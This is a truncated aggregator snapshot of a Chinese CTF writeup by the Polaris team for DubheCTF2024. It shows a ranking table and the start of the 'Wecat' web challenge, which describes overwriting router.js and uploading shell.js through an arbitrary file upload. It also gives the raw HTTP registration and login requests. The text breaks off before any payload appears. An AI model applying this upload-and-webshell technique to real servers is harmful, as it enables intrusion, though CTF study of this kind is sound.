看啥推荐读物
专栏名称: 星盟安全
星盟安全工作室---“VENI VIDI VICI”(我来,我见,我征服),我们的征途是星辰大海。从事各类安全研究,专注于知识分享。
今天看啥  ›  专栏  ›  星盟安全

DubheCTF2024 Writeup --Polaris战队

星盟安全  · 公众号  ·  · 2024-03-21 20:05
本次 DubheCTF2024,我们Polaris战队排名第11。排名队伍总分11星盟ctf战队6082.5712Lilac5888.04130xFFF_5861.7814Vidar-Team5548.1115Nepnep4673.9416AuroraSZU3765170RAYS357518USTC-NEBULA316519Dawn3091.0620ukfc2764WebWecat存在任意文件上传覆盖router.js和上传shell.js实现获取flag注册POST /wechatAPI/sign/success HTTP/1.1Host: 1.95.54.149:portOrigin: http://192.168.0.105:8088Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6Accept: application/json, text/plain, */*Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0Referer: http://192.168.0.105:8088/emailCheckAccept-Encoding: gzip, deflateContent-Length: 115{"email":"test@qq.com","nickName":"a","trueName":"a","pwd":"xxxx","avatar":"/img/ginger-cat-713.7c864d1a.png"}登录获取tokenPOST /wechatAPI/login/pwd HTTP/1.1Host: 1.95.54.149:portAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB; ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照